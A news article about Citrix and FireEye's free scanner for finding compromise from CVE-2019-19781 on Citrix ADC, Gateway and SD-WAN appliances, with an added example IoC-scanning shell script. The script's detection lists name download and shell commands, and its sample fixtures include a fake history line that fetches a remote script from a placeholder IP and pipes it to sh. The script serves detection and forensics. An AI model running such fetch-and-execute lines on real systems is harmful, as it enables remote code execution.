Citrix released a free scanner for detecting compromised Citrix Application Delivery Controller (ADC), Citrix Gateway, and Citrix SD-WAN WANOP appliances by digging for indicators of compromise (IoC) collected in incident response engagements related to CVE-2019-19781 exploitation.
The tool was developed in collaboration with FireEye and is designed to be run locally against an organization's Citrix instances, one appliance at a time, to assess whether indicators of compromise are present on the system.
Citrix Senior Director Karen Master told BleepingComputer that "right now there are no plans for scanning in parallel" when asked if there were any plans to add support for network scanning.
"The goal of the scanner is to analyze available log sources and system forensic artifacts to identify evidence of successful exploitation of CVE-2019-19781," Citrix says.
"There are limitations in what the tool will be able to accomplish, and therefore, executing the tool should not be considered a guarantee that a system is free of compromise."
How to use the Citrix IoC scanner
While it should be launched on a Citrix ADC, Gateway, or SD-WAN WANOP Appliance to scan for known indicators of compromise, the tool can also be used to inspect mounted forensic images of Citrix instances.
The IoC scanner allows you to discover evidence of devices that were successfully compromised by attackers, evidence of attackers having scanned vulnerable Citrix servers, as well as evidence of failed scanning attempts.
According to Citrix, the scanner can be used to identify:
• file system paths of known malware
• post-exploitation activity in shell history
• known malicious terms in NetScaler directories
• unexpected modification of NetScaler directories
• unexpected crontab entries
• unexpected processes
• ports used by known malware
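To make those evidence classes concrete, here is an added example in POSIX shell, written for this article and not code from the Citrix/FireEye scanner. It takes a scan root (a live appliance's `/` or a mounted forensic image) and a saved listener snapshot, and applies one check per class listed above. Every indicator value, the NetScaler directory list, the FreeBSD-style crontab location and the sample artifacts it builds are constructed placeholders, marked as such in the code; a real run swaps in vetted IoCs.

```shell
#!/bin/sh
# Added example, not the Citrix/FireEye scanner: a minimal IoC scan over the
# evidence classes listed above. Every indicator value, directory name and
# sample artifact below is a CONSTRUCTED placeholder; a real scan uses vetted IoCs.

# Hypothetical indicator lists, one entry per line (constructed).
KNOWN_MALWARE_PATHS='/var/tmp/.example_implant
/netscaler/portal/templates/example_dropper.xml'
HISTORY_TERMS='curl http
wget http
base64 -d
chmod +x /var/tmp'
CRON_TERMS='/var/tmp/
/tmp/
curl
wget
perl -e'
DIR_TERMS='exec(
system(
/bin/sh'
MALWARE_PORTS='18634
4444'
# Directories that should not change outside maintenance windows (assumed layout).
NETSCALER_DIRS='/netscaler/portal/templates
/netscaler/portal/scripts'
RECENT_DAYS=7
TAB=$(printf '\t')

# Each scan_* function prints one finding per line, "<category>\t<where>\t<evidence>",
# and prints nothing when clean, so a caller can simply count lines.
grep_terms() {                  # $1 category, $2 file, $3 newline-separated fixed strings
  [ -f "$2" ] || return 0
  pat=$(mktemp)
  printf '%s\n' "$3" > "$pat"
  # Fixed-string match, comment lines dropped, each matching line reported once.
  grep -F -f "$pat" "$2" | grep -v '^[[:space:]]*#' | while IFS= read -r line; do
    printf '%s\t%s\t%s\n' "$1" "$2" "$line"
  done
  rm -f "$pat"
}
scan_known_paths() {            # $1 = root to scan ("/" live, or a mounted forensic image)
  printf '%s\n' "$KNOWN_MALWARE_PATHS" | while IFS= read -r p; do
    if [ -e "$1$p" ]; then printf 'known-malware-path\t%s\texists\n' "$1$p"; fi
  done
}
scan_shell_history() {          # $1 = root; any dotfile history up to four levels deep
  find "$1" -maxdepth 4 -type f -name '.*history' 2>/dev/null | while IFS= read -r f; do
    grep_terms shell-history "$f" "$HISTORY_TERMS"
  done
}
scan_crontabs() {               # $1 = root; /etc/crontab plus FreeBSD-style /var/cron/tabs (assumed)
  for f in "$1"/etc/crontab "$1"/var/cron/tabs/*; do grep_terms crontab "$f" "$CRON_TERMS"; done
}
scan_netscaler_dirs() {         # $1 = root; malicious terms, then files changed within RECENT_DAYS
  printf '%s\n' "$NETSCALER_DIRS" | while IFS= read -r d; do
    [ -d "$1$d" ] || continue
    find "$1$d" -type f 2>/dev/null | while IFS= read -r f; do
      grep_terms dir-malicious-term "$f" "$DIR_TERMS"
    done
    find "$1$d" -type f -mtime "-$RECENT_DAYS" 2>/dev/null | while IFS= read -r f; do
      printf 'dir-recent-change\t%s\tmodified within %s days\n' "$f" "$RECENT_DAYS"
    done
  done
}
scan_listen_ports() {           # $1 = saved listener snapshot in sockstat(1)-style columns
  [ -f "$1" ] || return 0
  # Column 6 is LOCAL ADDRESS ("*:18634", "10.0.0.5:443"); the port follows the last ':'.
  awk 'NR > 1 { n = split($6, a, ":"); print a[n] "\t" $0 }' "$1" | while IFS="$TAB" read -r port rest; do
    printf '%s\n' "$MALWARE_PORTS" | while IFS= read -r p; do
      if [ "$port" = "$p" ]; then printf 'malware-port\t%s\t%s\n' "$port" "$rest"; fi
    done
  done
}
run_scan() {                    # $1 = root, $2 = listener snapshot; prints every finding
  scan_known_paths "$1"; scan_shell_history "$1"; scan_crontabs "$1"
  scan_netscaler_dirs "$1"; scan_listen_ports "$2"
}
count_findings() {              # $1 root, $2 snapshot, $3 optional category; prints the count
  run_scan "$1" "$2" | awk -F '\t' -v c="$3" 'c == "" || $1 == c { n++ } END { print n + 0 }'
}
make_sample_image() {           # builds a CONSTRUCTED fake appliance tree and prints its path
  root=$(mktemp -d)
  mkdir -p "$root/var/tmp" "$root/var/cron/tabs" "$root/root" "$root/netscaler/portal/templates"
  : > "$root/var/tmp/.example_implant"
  printf 'ls -la\ncurl http://203.0.113.9/x.sh | sh\n' > "$root/root/.bash_history"
  printf '# hourly\n0 * * * * /var/tmp/.example_implant\n' > "$root/var/cron/tabs/nobody"
  printf '%s\n' 'exec("/bin/sh")' > "$root/netscaler/portal/templates/evil.xml"
  printf 'USER COMMAND PID FD PROTO LOCAL ADDRESS FOREIGN ADDRESS\n' > "$root/listeners.txt"
  printf 'nobody perl 123 4 tcp4 *:18634 *:*\nroot nsppe 45 7 tcp4 *:443 *:*\n' >> "$root/listeners.txt"
  printf '%s\n' "$root"
}
# Usage: scanner.sh <root> <snapshot>  (e.g. "/" and the output of `sockstat -4l` on a
# FreeBSD-based appliance); with no arguments it scans the constructed sample tree.
if [ $# -ge 2 ]; then run_scan "$1" "$2"
else IMG=$(make_sample_image); run_scan "$IMG" "$IMG/listeners.txt"
  echo "total findings: $(count_findings "$IMG" "$IMG/listeners.txt")"; fi
```

Two design points carry over to any real scanner of this kind. Every check reads from a path argument rather than from the running system, which is what lets the same script run over a mounted image; the only live-collection step is taking the listener snapshot before the scan. And the recent-modification check is deliberately separate from the malicious-term check: right after an upgrade or mitigation rollout, files under the NetScaler directories may legitimately have fresh timestamps, so a `dir-recent-change` finding on its own is a lead to review, while a `known-malware-path` or `malware-port` finding is evidence.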
The CVE-2019-19781 IoC scanner is designed to be used with the following Citrix products:
• Citrix ADC and Citrix Gateway version 12.1
• Citrix ADC and Citrix Gateway version 12.0
• Citrix ADC and Citrix Gateway version 11.1
• Citrix ADC and Citrix Gateway version 10.5
• Citrix SD-WAN WANOP software and appliance models 4000, 4100, 5000, and 5100
Citrix provides detailed usage instructions in the tool's GitHub repository, and the standalone Bash script can be downloaded from either the Citrix or the FireEye repository.
Customers urged to scan their appliances
Citrix and FireEye strongly advise all Citrix customers to run this tool against their appliances as soon as possible to identify potential compromise and to take the steps needed to protect their organization.
Citrix released permanent fixes for ADC versions 11.1 and 12.0 this weekend and provides mitigation measures for ADC versions 10.5, 12.1 and 13, and for SD-WAN WANOP versions 10.2.6 and 11.0.3.
A separate tool to check if the mitigations have been successfully applied to vulnerable servers is also available.
On January 13, the Cybersecurity and Infrastructure Security Agency (CISA) also released a public-domain tool that organizations can use to test whether their servers are vulnerable to attack.
We are committed to the security of our products & we are making every effort to ensure all customers are supported in response to #CVE201919781. To that end, we have teamed up with @FireEye on a scanner that aids customers in the detection of compromise.https://t.co/Nk8xO95fVv
— Citrix (@citrix) January 22, 2020
Ongoing attacks targeting CVE-2019-19781
An unknown threat actor is currently patching vulnerable Citrix ADC servers against further CVE-2019-19781 exploitation attempts while also deploying backdoors on them to maintain future access, FireEye researchers discovered.
"FireEye believes that this actor may be quietly collecting access to NetScaler devices for a subsequent campaign," the report says.
Scans for vulnerable Citrix servers started on January 8, while proof-of-concept (PoC) exploits were made public about two days later.
GDI Foundation researcher Victor Gevers found 14,180 vulnerable Citrix endpoints two days ago, after Citrix published permanent fixes for some ADC appliance versions, roughly 9,000 fewer than security firm Bad Packets detected ten days ago.
17 hours ago, Citrix published updates & new fixes for #CVE201919781. 14,180 are still vulnerable. There are sensitive networks unpatched out there. With only a few volunteers we are trying to help (remotely) these organizations that are behind or stuck in the mitigation process. pic.twitter.com/6OkZ5wt7wS
— Victor Gevers (@0xDUDE) January 20, 2020
"While our security and engineering teams have been working around the clock to develop, test and deliver permanent fixes to CVE-2019-19781, we have been actively thinking of ways to assist our customers in understanding if and how their systems may have been affected," Citrix’s Chief Information Security Officer Fermin J. Serna said.
"We partnered with FireEye Mandiant, which is at the forefront of cyber threat intelligence and forensic analysis, to develop a tool that leverages their knowledge of recent attacks against CVE-2019-19781 to help organizations identify potential compromises."